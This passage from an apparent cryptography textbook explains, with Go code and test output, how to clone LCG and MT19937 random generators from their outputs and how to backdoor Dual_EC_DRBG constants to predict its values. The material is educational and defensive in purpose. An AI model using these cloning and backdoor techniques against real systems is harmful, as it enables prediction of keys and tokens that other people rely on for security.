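func recoverMultiplier(x0, x1, x2, m int64) int64 {
	num := ((x2-x1)%m + m) % m    // (X2 - X1) mod m, kept non-negative
	den := ((x1-x0)%m + m) % m    // (X1 - X0) mod m
	inv := findModInverse(den, m) // modular inverse of (X1 - X0)
	return (num * inv) % m
}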
Finding the modulus is the hardest part. Let's say we are trying to find the upper limit of the hour hand on a clock. In other words, we see numbers like 3, 5, 1, 11, 7, 8, etc. and we
are trying to find out how high they go when people talk about them. Sure, you know it’s 12
for the scenario of a clock but let’s say you were an alien who didn’t know that beforehand.
Somehow you were able to drop in on human conversations about daily plans. You could
probably infer that (for the hour hand on the clock) 11 is the highest number people talk
about. However, in a particularly non-happening place, you might end up assuming that
people’s plans go at the most up to only 8 PM so the whole circle represents only nine
hours in total. On the other hand, if you had an automatic counter scanning all the eggs
coming into a supermarket once you see the totals of 204, 120, 132, 84, 240 and 348
you might reasonably conclude that the eggs are coming in crates of dozens because the
greatest common divisor (GCD) of all those numbers is 12. In other words, all of these multiples of a dozen are congruent to zero modulo 12.
To find the modulus of our LCG we need to find values that are congruent to zero
modulo m. Let’s generate a bunch of values this time, as shown in equation 2.8.
X1 = (aX0 + c) mod m
X2 = (aX1 + c) mod m (2.8)
X3 = (aX2 + c) mod m
If we take the differences between each pair of consecutive values we get the equation
2.9.
Δ0 = (X1 − X0 ) mod m
Δ1 = (X2 − X1 ) mod m (2.9)
Δ2 = (X3 − X2 ) mod m
We can substitute values of X2 and X1 with their definitions from 2.8, resulting in
equation 2.10. Please note that the increment c is canceled out during the substitution. Therefore, each ΔN is a multiple of ΔN−1 modulo m.
Δ1 = (X2 − X1) mod m
Δ1 = (aX1 − aX0) mod m
Δ1 = (a(X1 − X0)) mod m                                            (2.10)
Δ1 = (aΔ0) mod m
Δ2 = (aΔ1) mod m
Equation 2.10 can be used to find large numbers congruent to zero modulo m. Let’s call these “zeros”; they can be found by rearranging equation 2.10 into equation 2.11.
Zero = Δ2Δ0 − Δ1Δ1
Zero ≡ a^2Δ0^2 − a^2Δ0^2 (mod m)                                   (2.11)
Zero ≡ 0 (mod m)
We can collect such “zero” values (which are non-zero integers but are congruent to zero modulo m because they are multiples of m, similar to how 24, 36, 72 and 48 are
multiples of 12) and then calculate their GCD to find the modulus. To calculate the GCD
we will use the Go big library again as shown in listing 2.10.
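As a sketch of the idea behind listing 2.10 (the book's code may differ), the function below builds a few "zeros" per equation 2.11 and folds them into a running GCD; with enough observed outputs the GCD converges to the modulus (or a small multiple of it). It assumes math/big is imported as in listing 2.8 and the function name is made up.

// recoverModulus collects zeros from consecutive output differences and
// returns their greatest common divisor.
func recoverModulus(outputs []int64) int64 {
	var deltas []*big.Int // deltas[i] = X_{i+1} - X_i
	for i := 0; i+1 < len(outputs); i++ {
		deltas = append(deltas, big.NewInt(outputs[i+1]-outputs[i]))
	}
	var gcd *big.Int
	for i := 0; i+2 < len(deltas); i++ {
		// zero = delta[i+2]*delta[i] - delta[i+1]^2, a multiple of m
		zero := new(big.Int).Sub(
			new(big.Int).Mul(deltas[i+2], deltas[i]),
			new(big.Int).Mul(deltas[i+1], deltas[i+1]),
		)
		zero.Abs(zero)
		if gcd == nil {
			gcd = zero
		} else {
			gcd.GCD(nil, nil, gcd, zero)
		}
	}
	return gcd.Int64()
}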
Listing 2.13 tests our CloneLCG() function by creating an LCG and seeding it with the
current UNIX time in seconds. We then clone the LCG and generate 100 values to ensure
that the cloned RNG and original RNG are generating the same values, or in other words,
the cloned RNG is predicting the original RNG correctly.
You can run these tests using make exploit_lcg in the code repo:
$ make exploit_lcg
go clean -testcache
go test -v ./ch02/lcg/go/exploit_lcg
=== RUN TestCloneLCG
exploit_lcg_test.go:26: observed: 52e4acba, cloned: 52e4acba
exploit_lcg_test.go:26: observed: 72008d98, cloned: 72008d98
exploit_lcg_test.go:26: observed: 797724ca, cloned: 797724ca
exploit_lcg_test.go:26: observed: 2f7f18a9, cloned: 2f7f18a9
exploit_lcg_test.go:26: observed: 4672328b, cloned: 4672328b
--- PASS: TestCloneLCG (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/exploit_lcg 0.031
s
thwarts backward secrecy because the attacker can simply replicate the state by looking at
the output and then use the publicly-known algorithm to generate new values.
We address this by adding another dotted arrow between the state and the output as
shown in figure 2.10.
Figure 2.10 Some PRNGs transform the state before outputting it as the next value.
The dotted arrows represent transformations that are hard to reverse. This means that if
someone knows the output on the right, it should be hard for them to calculate the state
and by extension, the previous values (coming into the box from the left). The next block
would therefore look like figure 2.11.
We can now visualize our PRNGs as a “state-machine” as shown in figure 2.12.
There are three functions in figure 2.12:
Init(Seed) transforms the seed to generate State0 .
Input-based attacks: Every PRNG needs to be seeded. If an attacker can guess the
seed they can recover the entire output by simply running the PRNG on that seed.
For example, it used to be common practice in applications to seed using the system
time. Similar to the birthday password-guessing we saw earlier in this chapter, the
attacker can simply guess all the seconds in the last month to find the right seed. For
our LCG examples, we used a fixed seed of 42 precisely because we want to generate
a fixed output that we would then be able to compare to a reference implementation.
To protect against these attacks TRNGs are used to seed the input of PRNGs. Re-
member, TRNGs produce random numbers based on physical phenomena but are
not very performant. PRNGs provide good performance but rely on a seed value
which can lead to input-based attacks. The solution is to combine them as shown in
figure 2.7.
State Compromise Extension Attacks: If an attacker can compute the internal state
of a PRNG (essentially somehow reverse the Next() function in figure 2.12), they can
compute all the future values that will be generated by this PRNG. We will cover this
in much more detail in the next chapter where we will implement two such attacks.
2.3 Summary
Random numbers are used extensively in cryptographic applications.
Random number generators are characterized by their output distribution and en-
tropy.
The entropy of an RNG is maximized when its output distribution is uniform.
Hardware random number generators (HRNGs) – also known as true random num-
ber generators (TRNGs) – sample physical phenomena to generate a slow but unpre-
dictable stream of output.
TRNGs need to be carefully designed and tested to ensure good quality randomness.
Since they are used as input to CSPRNGs which eventually generate all the random-
ness needed for cryptography, good security begins at the TRNG.
TRNGs can be based on a variety of physical phenomena ranging from nuclear decay
to noise in electrical circuits.
Avalanche and Zener diodes are widely used in TRNG constructions but are sus-
ceptible to attacks and do not provide a good way to assess the health of the RNG
process.
Modular entropy multiplication is a relatively newer method for constructing TRNGs
which also provides a physical model to assist in continuous monitoring of the RNG’s
health.
Pseudo-random number generators (PRNGs) take seed values as input and generate
a fast but deterministic stream of output.
Cryptographically secure pseudo-random number generators (CSPRNGs) are PRNGs that
satisfy some additional properties, most importantly backward and forward security.
Always use CSPRNGs for cryptographic applications and avoid weak PRNGs that
are used by default in many programming languages.
Seed your CSPRNGs with good-quality seeds obtained from TRNGs.
Periodically reseed your CSPRNG so that the same seed is not used forever. This
helps protect against state extension attacks.
PRNGs are usually compromised by guessing their seed or by reverse-engineering
their internal states.
Linear congruential generators (LCGs) are very basic (and insecure) PRNGs; there is no difference between their state and their output.
LCG-based RNGs can be broken by recovering their parameters (increment, multiplier, modulus) from generated values using modular arithmetic.
3
Implementing and exploiting RNGs
This chapter covers
How cryptographically secure pseudo-random number generators (CSPRNGs) are implemented
How CSPRNGs can be compromised via specific weaknesses in their underlying algorithms
In the previous chapter, we saw how pseudo-random number generators (PRNGs) work
in theory. In this chapter, we will implement two widely-known RNGs and then write code
to exploit them. One of them is a CSPRNG that was recommended by NIST (National Institute of Standards and Technology)! 1
Init(Seed) transforms the seed to generate State0 .
As we cover two examples in this chapter we will see how those functions are imple-
mented by the respective RNGs.
1 Cryptographic implementations widely rely on algorithms and constants defined by NIST standards.
Figure 3.1 PRNGs mutate the previous state to generate the next one.
We can now tackle initialization of the internal state based on a seed value x0 . This is
equivalent to the Init(Seed) function in figure 3.1. The initialization function sets N
values of x according to the formula shown in equation 3.1, where i starts from 0 and runs
up to N − 1.
 3 const (
 4     W uint32 = 32         // w in equation 3.1
 5     N uint32 = 624        // the MT19937 state in listing 3.1 consists of 624 integers
 6     M uint32 = 397
 7     R uint32 = 31
 8
 9     A uint32 = 0x9908B0DF
10     F uint32 = 1812433253 // f in equation 3.1
11
12     U uint32 = 11
13     D uint32 = 0xFFFFFFFF
14
15     S uint32 = 7
16     B uint32 = 0x9D2C5680
17
18     T uint32 = 15
19     C uint32 = 0xEFC60000
20
21     L uint32 = 18
22
23     LowerMask uint32 = 0x7FFFFFFF
24     UpperMask uint32 = 0x80000000
25 )
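A sketch of the state struct and the seeding routine is shown below. The field names are assumptions, and the book's listings 3.1 and 3.3 may differ in details.

// MT19937 mirrors the structure described in the chapter: 624 uint32 words of
// state plus an index into them.
type MT19937 struct {
	state [N]uint32 // the 624 words of internal state
	index uint32    // position of the next word to be tempered and output
}

// Seed initializes the state from a single seed word (equation 3.1): the seed
// becomes the first word and every following word is derived from the
// previous one.
func (mt *MT19937) Seed(seed uint32) {
	mt.state[0] = seed
	for i := uint32(1); i < N; i++ {
		prev := mt.state[i-1]
		mt.state[i] = F*(prev^(prev>>(W-2))) + i
	}
	mt.index = N // force a twist before the first value is generated
}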
MT19937 defines a Temper(x) function that takes a single xi and “tempers” the input
to generate a transformed output. This is similar to the Output(StateN ) function in figure
3.1, and it should be hard to reverse. Listing 3.4 implements the temper function in Go. It
utilizes some more constants from the ones we defined in listing 3.1. As we will see in the
upcoming section on exploiting our RNG, the reversibility of the Temper(x) function plays
a huge role in making MT19937 insecure. It transforms y to output y4 by performing
some complicated bit-manipulation on it but all of the operations are easily reversible for
an adversary regardless of their complexity.
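The tempering steps themselves can be sketched as follows; the book's listing 3.4 may differ in variable names and layout.

// temper applies four shift/mask/XOR steps to one state word. Each step is
// easily reversible, which is what the upcoming attack exploits.
func temper(y uint32) uint32 {
	y1 := y ^ (y>>U)&D   // XOR-shift-AND step 1
	y2 := y1 ^ (y1<<S)&B // step 2 (the step reversed in figures 3.3 through 3.7)
	y3 := y2 ^ (y2<<T)&C // step 3
	y4 := y3 ^ y3>>L     // step 4
	return y4
}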
After seeding and generating the first 624 values, MT19937 will have exhausted its internal state. At that point, the algorithm defines another function called Twist(state), which takes an existing state of 624 values and generates 624 new values to be used as the next state. This
is equivalent to the Next(StateN ) function in figure 3.1. The twist() function shown
in listing 3.5 loops from 0 to N-1 and updates each element of the state by following
some more bit manipulation techniques. The attacker does not need to understand the
details behind why the bit manipulation is done the way it is, their only goal is to reverse
the manipulations which we will in the upcoming section. The important thing to keep
in mind is that twist() will transform the current state of 624 values to generate a new
internal state with the same cardinality (i.e., exactly 624 values as before) but an entirely
new batch of numbers. The twist() function also relies on some of the constants listed
in listing 3.2.
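A sketch of the twist operation is shown below; the book's listing 3.5 may differ in details.

// twist refreshes the entire state: every word is recombined with its
// neighbors and conditionally XORed with the constant A.
func (mt *MT19937) twist() {
	for i := uint32(0); i < N; i++ {
		x := (mt.state[i] & UpperMask) | (mt.state[(i+1)%N] & LowerMask)
		xA := x >> 1
		if x&1 == 1 {
			xA ^= A
		}
		mt.state[i] = mt.state[(i+M)%N] ^ xA
	}
	mt.index = 0 // the refreshed state will be consumed from the beginning
}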
We can now combine our temper(y) and twist() functions to write code for gener-
ating random numbers. The Generate() function shown in listing 3.6 takes the next ele-
ment in the state pointed to by mt.index and outputs it after running it through temper(y).
If mt.index runs its course of 624 values the state is refreshed by calling mt.twist() on
line 56.
To test our implementation we seed it with a fixed value and test the output against a
sequence generated by a reference implementation (you can use std::mt19937 in C++ to
generate these values). The code for this test is shown in listing 3.7.
You should run the test yourself by executing make mt19937 in the accompanying code
repository. We now have a working implementation of MT19937 that we can exploit.
The bulk of the exploit work is carried out by the CloneMT19937(mt) function which
takes an MT19937 RNG as input and clones it strictly by observing its output. The goal
of this function is to generate values using the original RNG while somehow reversing
its internal state just by using the observed values, and then use the recovered state to
construct a cloned RNG.
Listing 3.9 shows our attack function. It generates N values using the original RNG.
Each number in the internal state of the original RNG corresponds to exactly one gen-
erated value, albeit not directly. The RNG algorithm picks a number from the internal
state and transforms it using the temper(y) function. To recover the original state we call
an untemper(y) function on line 34 that will reverse this transformation. Once we have
recovered the entire state of the original RNG by “untempering” N generated values we
can construct a new RNG with this state and return that as the result of our RNG cloning
attack.
It is finally time to tackle the untempering that lies at the heart of our attack. In the
previous section we defined temper(y) in listing 3.4 that did some bit twiddling to go
from y →y1 →y2 →y3 →y4 and then returned y4. Our untemper(y) therefore needs to
go in the other direction, i.e., from y4 →y3 →y2 →y1 →y and then return the recovered
y. This is visualized in figure 3.2.
Figure 3.2 Attacker observes PRNG output and reverses operations to recover PRNG state.
Our goal is to build an intuition of how the bitwise operations are reversed. The good
news is that each step (e.g., from y2 to y3) looks pretty similar, i.e., it involves one XOR
operation (the ^ symbol), one bitwise shift operation (in the left or right direction, denoted by << and >> respectively) and one bitwise AND operation denoted by &. For example, when
the original RNG is tempering values it calculates y2 from y1 using the line shown in listing
3.10.
Listing 3.10 XOR-Shift-AND in MT19937’s temper(y) function
y2 := y1 ^ (y1<<S)&B
To understand how the reversal works, let’s look at individual bits, starting from the
original 32 bits of y1 as shown in figure 3.3.
The first transformation that takes place is the one specified inside the brackets, i.e., (y1
« S). Since S is defined as a constant in listing 3.2, we can visualize this operation as shown
in figure 3.4.
The next step is to perform bitwise AND between y1 « S (figure 3.4) and the constant
B. The individual bits of B are shown in figure 3.5.
After performing the bitwise AND between figures 3.4 and 3.5 we end up with figure
3.6. Please note that the true bits of B have the effect of “activating” the corresponding bit
in figure 3.4, which is a fundamental property of bitwise AND.
The final step for transforming y1 into y2 is to XOR the result of figure 3.6 with the
original y1, giving us figure 3.7, which is equivalent to y2.
If you look at figure 3.7 closely you will notice that y2 retains a lot of information about
y1. In fact, if we start from the right-hand side and start scanning to the left we will see
that the first 7 bits correspond exactly to y1 bits. That is, bit 0 of y1 is equal to bit 0 of y2, bit 1 of y1 is equal to bit 1 of y2, and so on all the way up to the seventh bit from the right (bit 6).
Figure 3.7 y2 = y1 ^ (y1 << S) & B
We do not need to look at each bit being recovered to understand the attack. The main
intuition stays the same throughout the process: we reverse the bitwise operations one
by one and use earlier recovered bits to aid in calculating more bits. The complete code
for untempering y from y4 is shown in listing 3.11. Lines 15 - 24 show how we “build
the bridge” from right to left for recovering y1 from y2. Please note that the direction
of the bitwise shift operation is reversed between tempering and untempering for each
corresponding recovery.
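The bridge-building for a single step can be sketched as follows; this only reverses one transformation of the form y2 = y1 ^ (y1<<shift)&mask and is not the book's full listing 3.11.

// undoLeftShiftAndMask recovers y1 from y2 when y2 = y1 ^ (y1<<shift)&mask.
// The lowest `shift` bits of y2 are identical to those of y1; every higher
// bit of y1 is then rebuilt from bits that were already recovered.
func undoLeftShiftAndMask(y2, shift, mask uint32) uint32 {
	var y1 uint32
	for i := uint32(0); i < 32; i++ {
		bit := (y2 >> i) & 1
		if i >= shift {
			// the XORed-in bit came from y1 at position i-shift, masked by
			// the corresponding bit of the constant
			bit ^= ((y1 >> (i - shift)) & 1) & ((mask >> i) & 1)
		}
		y1 |= bit << i
	}
	return y1
}

Calling undoLeftShiftAndMask(y2, S, B) recovers y1; the right-shift steps are reversed analogously, with the bridge built from the most significant bits instead.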
Listing 3.11 ch03/mt19937/exploit_mt19937/exploit_mt19937.go
go test -v ./ch03/mt19937/exploit_mt19937
=== RUN TestCloneMT19937
exploit_mt19937_test.go:22: observed: bcc1df92, cloned: bcc1df92
exploit_mt19937_test.go:22: observed: d0d8875f, cloned: d0d8875f
exploit_mt19937_test.go:22: observed: d0f264cc, cloned: d0f264cc
exploit_mt19937_test.go:22: observed: 374635d9, cloned: 374635d9
exploit_mt19937_test.go:22: observed: bc6d6cc3, cloned: bc6d6cc3
--- PASS: TestCloneMT19937 (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch03/mt19937/exploit_mt19937
0.029s
We successfully cloned a PRNG just by observing its generated values, without ever having access to the internal state of the original RNG. Now we can “predict” any values that are going to be generated by the original generator. We were able to accomplish this
because MT19937’s equivalent function of the Output(N) operation in figure 3.1 is easily
reversible.
3.2 Implementing and exploiting Dual Elliptic Curve Deterministic Ran-
dom Bit Generator
We saw how to implement and reverse the MT19937 PRNG. Our next example is one of
the most famous CSPRNGs – albeit for some pretty unfortunate reasons.
DUAL_EC_DRBG stands for Dual Elliptic Curve Deterministic Random Bit Generator.
For nine years between 2006 and 2015, it was one of the four CSPRNGs recommended
by NIST in the SP 800-90A standard. 3
The algorithm (much like the ones we covered for LCG and MT19937 generators)
relies on some mathematical constants. It is possible that the constants recommended by
NIST contained a backdoor that allowed NSA (National Security Agency) to clone any
DUAL_EC_DRBG after observing just a couple of generated values – even though it is
supposed to be cryptographically secure!
We cannot conclusively ascertain that the constants recommended by NIST did con-
tain a backdoor; instead we will see how these constants can be picked in a way that can
make the algorithm exploitable. In other words, we will learn how, if we were the ones recommending constants for DUAL_EC_DRBG, we could pick them in a way that would allow us to predict future values after observing its output.
Before we implement DUAL_EC_DRBG though we need to learn about some build-
ing blocks, starting with big numbers.
Listing 3.13 Calculating the smallest Fibonacci number with 100 digits
1 package main
2
3 import (
Running this program will print a really large number on the output (it’s a 100 digit
number that has been broken down over two lines for presentation).
13447196675861531814197166417245678868908506962757
67987106294472017884974410332069524504824747437757
As you can see, this number is much larger than what we can store in 32 (or even 64)
bits. The big package however could handle it easily because it can work with arbitrary-
precision integers.
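For reference, a complete, self-contained version of the computation described above might look like the following sketch; the book's listing 3.13 may be structured differently.

package main

import (
	"fmt"
	"math/big"
)

func main() {
	// The smallest 100-digit number is 10^99.
	limit := new(big.Int).Exp(big.NewInt(10), big.NewInt(99), nil)

	a := big.NewInt(0)
	b := big.NewInt(1)
	for b.Cmp(limit) < 0 {
		a.Add(a, b) // a becomes a+b
		a, b = b, a // slide the window: (a, b) -> (b, a+b)
	}
	fmt.Println(b) // the first Fibonacci number with 100 digits
}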
y^2 = x^3 + ax + b                                                 (3.2)
Some example plots are shown in figure 3.9 for various values of a and b:
Go comes with the crypto/elliptic package that can be used to perform operations
on elliptic curves. We will cover elliptic curves in more detail in later chapters. For the
time being the important things to understand are:
An elliptic curve is a set of points defined by the equation 3.2.
For a given curve, addition can be performed between any two points P and Q. The
result P + Q will also lie on the curve. An analogy can be drawn in modular arithmetic by saying that if z = (x + y) mod n then z is also an integer less than n, just like
x and y. The operation does not involve simply numerically adding the respective
coordinates, as that would result in a point somewhere outside of the curve. For ellip-
tic curves + denotes a special operation that satisfies various properties we need (e.g.,
P +Q = Q +P). We do not need to worry about the details of that operation right now,
Figure 3.9 Some example elliptic curves obtained by plotting equation 3.2 for different values of a and
b.
10 const (
11     Px = "6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296"
12     Py = "4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5"
13     Qx = "c97445f45cdef9f0d3e05e1e585fc297235b82b5be8ff3efca67c59852018192"
14     Qy = "b28ef557ba31dfcbdd21ac46e2a91e3c304f44cb87058ada2cb815151e610046"
15 )
The generation algorithm depends on two functions gP (x) and gQ (x). These corre-
spond to Next(...) and Output(...) in figure 3.10 respectively.
Figure 3.10 gP (x) advances the state, gQ (x) transforms it before generating an output value.
The internal state of the DUAL_EC_DRBG consists of just one bignum. The defini-
tions of gP (x) and gQ (x) rely on the scalar multiplication of this bignum with points P
and Q respectively. The result of the scalar multiplication is not, however, directly used.
Instead, two helper functions are used:
X (x, y) = x; discards the y coordinate and returns just the x coordinate.
t(x); returns the 30 least significant bytes of x. In other words, it “truncates” the input
to 30 bytes.
If the internal state of the single bignum is denoted by n, gP (x) and gQ (x) are defined
as shown in equation 3.3.
gP (n) = X (nP)
(3.3)
gQ (n) = t(X (nQ))
Equation 3.3 can be read as "to advance the RNG, perform scalar multiplication of the point P with the internal state n and store the X-coordinate as the new state". Similarly, the second line can be read as "to generate a new value, perform scalar multiplication of the point Q with the internal state and truncate the X-coordinate of the result to 30 bytes before outputting it as the next random number". In terms of our understanding of PRNG operation in figures 3.1 & 3.10, we can write the Next(...) and Output(...) functions as shown in equation 3.4.

Next(State_N) = g_P(State_{N-1})
Output(State_N) = g_Q(State_N)    (3.4)
The actual code for generating the numbers is pretty minimal thanks to the crypto/elliptic package doing most of the heavy lifting. We start by defining a type that represents a point on the curve. When creating a new Point, we take two strings as input representing the x and y coordinates. We then use big.Int to parse these strings and (if they are valid inputs) store them as two bignums (one for each coordinate). This is shown in listing 3.16.
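A sketch of what such a Point type might look like is shown below (the book's listing 3.16 has the actual definition; the package name and error handling here are illustrative assumptions).

package impl_dual_ec_drbg // hypothetical package name, for illustration only

import (
	"fmt"
	"math/big"
)

// Point holds the affine coordinates of a curve point as two bignums.
type Point struct {
	X, Y *big.Int
}

// NewPoint parses two hexadecimal strings into a Point.
func NewPoint(xHex, yHex string) (*Point, error) {
	x, ok := new(big.Int).SetString(xHex, 16)
	if !ok {
		return nil, fmt.Errorf("invalid x coordinate: %q", xHex)
	}
	y, ok := new(big.Int).SetString(yHex, 16)
	if !ok {
		return nil, fmt.Errorf("invalid y coordinate: %q", yHex)
	}
	return &Point{X: x, Y: y}, nil
}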
We can now implement the RNG operations defined in equation 3.4 in a Generate() function as shown in listing 3.18.
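Building on the Point sketch above (and assuming crypto/elliptic and math/big are imported), a hedged sketch of what Generate() could look like follows; it outputs from the current state and then advances it, matching the indexing of equation 3.5, but the book's listing 3.18 is the authoritative version.

// DualEcDrbg holds the curve, the two public points, and the single-bignum state.
type DualEcDrbg struct {
	curve elliptic.Curve
	p, q  *Point
	state *big.Int
}

// Generate produces the next 30-byte output and advances the internal state.
func (drbg *DualEcDrbg) Generate() []byte {
	// Output: o_i = t(X(s_i * Q)), computed from the current state.
	ox, _ := drbg.curve.ScalarMult(drbg.q.X, drbg.q.Y, drbg.state.Bytes())
	out := ox.FillBytes(make([]byte, 32))[2:] // t(): keep the 30 least significant bytes

	// Advance: s_{i+1} = X(s_i * P).
	sx, _ := drbg.curve.ScalarMult(drbg.p.X, drbg.p.Y, drbg.state.Bytes())
	drbg.state = sx

	return out
}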
And that’s it! We now have a fully functional DUAL_EC_DRBG that we can exploit
in the next section.
s_0 = Seed
o_0 = t(X(s_0 Q))
s_1 = X(s_0 P)          (3.5)
o_1 = t(X(s_1 Q))

Can we predict o_1 just by observing o_0? If P and Q are related such that P = dQ, then we can multiply s_0 Q by d to get s_0 P, as shown in equation 3.6, which really constitutes the heart of our attack on DUAL_EC_DRBG.

d(s_0 Q) = s_0 P    (3.6)
Once we have s_0 P we will essentially have recovered the next state s_1, which means we can now clone any output from this RNG. If P and Q were not related, there would have been no way to observe o_0 and somehow deduce s_1. The flow of the attack is shown in figure 3.11.
Figure 3.11 The attacker observes Output_0 and calculates State_1 using the secret relationship between P and Q.
The first hurdle for our attack is to recover the point s_0 Q from the observed output o_0. We know that the output o_0:
Has discarded the Y-coordinate of the original point s_0 Q by applying the X() function.
Even the remaining X-coordinate has been truncated to 30 bytes.
Let's think about how to reverse both of these transformations. If a point lies on a curve (in other words, satisfies its equation), we can calculate the Y-coordinate simply by plugging the X-coordinate into the equation. This is analogous to looking up the stock price of a symbol at a particular time. The stock price is the Y-coordinate, with time running along the X-axis; the statement "stock price of XYZ when the market closed yesterday" holds just as much information as giving you the Y-coordinate value itself, because the curve (which company's plot we are tracking) and the point in time (the X-coordinate) are enough to convey the actual point on the plot.
The problem is, we do not have the entire X-coordinate. The original X-coordinate was 32 bytes long; the output function discarded 2 bytes and gave us the other 30. How can we get the 2 missing bytes?
Turns out, we can kill two birds with one stone here! We can simply try all possible values for those two bytes, i.e., from 0x0000 to 0xFFFF, and see if any of them satisfy our elliptic curve specified by equation 3.2, repeated here for the reader's convenience.

y^2 = x^3 + ax + b
y = √(x^3 + ax + b)    (3.7)
When we try all possible values for the missing 2 bytes of our X-coordinate, only the correct guess will satisfy equation 3.7. Every guessed value of x will produce some value when plugged into the right-hand side of the equation, but only the correct value will have an actual square root! Not only can we find the right X-coordinate using the equation, it also handily gives us the Y-coordinate for continuing our attack.
Listing 3.19 shows the code for calculating the Y-coordinate for a guessed X-coordinate. In case of wrong guesses, our calculation of the square root will fail at line 43. The calculations require us to pick a concrete curve (i.e., a set of values for a and b) to plug into equation 3.7. We do this by using a standard curve called P256, selected on line 36.
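The essence of that calculation can be sketched as follows (the book's listing 3.19 is the actual code; this standalone version assumes the errors, math/big, and crypto/elliptic imports). For P-256 the parameters give y^2 = x^3 - 3x + b mod p, and big.Int's ModSqrt returns nil exactly when the guessed x is not on the curve.

// calculateYCoordinate: given a candidate x, compute y on P-256 or report
// that no square root exists (i.e., the guess was wrong).
func calculateYCoordinate(x *big.Int) (*big.Int, error) {
	params := elliptic.P256().Params()

	// rhs = x^3 - 3x + b (mod p); NIST P-256 uses a = -3.
	rhs := new(big.Int).Exp(x, big.NewInt(3), params.P)
	rhs.Sub(rhs, new(big.Int).Mul(big.NewInt(3), x))
	rhs.Add(rhs, params.B)
	rhs.Mod(rhs, params.P)

	// ModSqrt leaves y untouched and returns nil when rhs is not a square mod p.
	y := new(big.Int).ModSqrt(rhs, params.P)
	if y == nil {
		return nil, errors.New("candidate x is not on the curve")
	}
	return y, nil
}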
Now let's see how the backdoor-ed constants themselves are generated; our attack requires P and Q to be secretly related as in equation 3.8.

P = dQ    (3.8)

Since P is fixed on the left-hand side by the standard curve definition itself, we have to find a Q that satisfies this relationship. We cannot just pick a random Q, because we would not know the scalar d relating it to P. Instead, we start by picking a random scalar value d. We then find the modular inverse of d and call it e. Now we can multiply both sides by e to get equation 3.9.

eP = edQ
eP = Q    (3.9)
Instead of randomly picking a point Q and multiplying it with a random scalar d to get
a secretly related P, we went the other way around. Point P was fixed by the P256 curve,
we generated a random scalar d, found its modular inverse and used that to calculate a
backdoor-ed point Q. The code for finding the backdoor-ed constants is shown in listing
3.20.
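A sketch of that constant generation (the book's listing 3.20 has the actual code; the function name is illustrative, and the crypto/rand, crypto/elliptic, and math/big imports are assumed) might look like:

// generateBackdooredConstants picks a secret scalar d and derives Q = e*P,
// where e = d^-1 mod N and P is the P-256 base point, so that P = dQ.
func generateBackdooredConstants() (*big.Int, *Point, error) {
	params := elliptic.P256().Params()

	// Pick a random d in [1, N).
	d, err := rand.Int(rand.Reader, new(big.Int).Sub(params.N, big.NewInt(1)))
	if err != nil {
		return nil, nil, err
	}
	d.Add(d, big.NewInt(1))

	// e = d^-1 mod N, then Q = e*P.
	e := new(big.Int).ModInverse(d, params.N)
	qx, qy := elliptic.P256().ScalarBaseMult(e.Bytes())
	return d, &Point{X: qx, Y: qy}, nil
}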
Let's write a test for our exploit as shown in listing 3.21. We will generate backdoor-ed constants and use them to instantiate a DUAL_EC_DRBG RNG. We then call CloneDualEcDrbg(...) on line 49, which takes the original RNG, the constants, as well as the secret value d that will be used to compromise the RNG operation.
Listing 3.21 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg_test.go
If you run the accompanying test using make dual_ec_drbg, you will see the test try
a few candidate values for x before finding the right one and then cloning the RNG. The
output is shown below (truncated for presentation):
go test -v ./ch03/dual_ec_drbg/exploit_dual_ec_drbg
=== RUN TestBackdoorConstants
--- PASS: TestBackdoorConstants (0.00s)
=== RUN TestCalculateYCoordinate
--- PASS: TestCalculateYCoordinate (0.00s)
=== RUN TestCloneDualEcDrbg
check: 2774d76eacc0c20b17de4d0958cfe6882fa9132cd2951f0eaba97d930a85
next_o: 2774d76eacc0c20b17de4d0958cfe6882fa9132cd2951f0eaba97d930a85, guess:
DCD2
exploit_dual_ec_drbg_test.go:60: observed=19fc85d9..., cloned=19fc85d9...
exploit_dual_ec_drbg_test.go:60: observed=9e12c097..., cloned=9e12c097...
exploit_dual_ec_drbg_test.go:60: observed=3ec6b2a4..., cloned=3ec6b2a4...
exploit_dual_ec_drbg_test.go:60: observed=01cf30cc..., cloned=01cf30cc...
exploit_dual_ec_drbg_test.go:60: observed=91d0b390..., cloned=91d0b390...
--- PASS: TestCloneDualEcDrbg (6.11s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch03/dual_ec_drbg/
exploit_dual_ec_drbg 6.124s
Congratulations, you have now implemented and exploited a bona fide CSPRNG by
performing a state-extension attack on it!
3.3 Summary
MT19937 is a widely used RNG whose internal state consists of 624 values. It is pretty straightforward to reverse one state value from one output, and therefore only 624 output values are needed to compromise the entire internal state of the RNG (allowing an attacker to predict all future values).
DUAL_EC_DRBG is a CSPRNG but its constants can be backdoor-ed in a way
that can enable the attacker to predict all future values by observing only a couple of
generated values.
(CS)PRNGs can be compromised by reversing or predicting their internal states by
only observing the generated values. The PRNG functions Next(...) and Output(...)
should make such reversals hard for an attacker.
This chapter covers
What is symmetric key encryption and what would make a symmetric encryption algorithm "perfect"?
What is the exclusive-or (XOR) operation, and how is it important for cryptography?
How can unbreakable encryption be achieved with a one-time pad (OTP), and what are the practical limitations of this approach?
What are stream ciphers, and how are they related to the one-time pad?
Implementing and exploiting linear-feedback shift registers (LFSRs) as stream ciphers
Implementing and exploiting the RC4 stream cipher
4
Stream ciphers
One of the core goals of cryptography is to provide confidentiality. Stream ciphers are
algorithms that help achieve confidentiality by encrypting plaintext one bit or one byte
at a time. They are used quite heavily in systems with limited computing power (e.g.,
embedded devices) or where performance requirements are quite high (e.g., for real-time
encryption of video calls). This chapter will explain what stream ciphers are, how they are
generally used and how attackers circumvent them.
As it happens, there is already a perfect, unbreakable algorithm for achieving this. It just comes with some practical limitations that prevent it from becoming "one encryption algorithm to rule them all." Understanding those limitations will also shed further light on the distinction between cryptographic theory and implementation; but before we get to the limitations, let's first discuss what it would mean for an encryption algorithm to be "perfect".
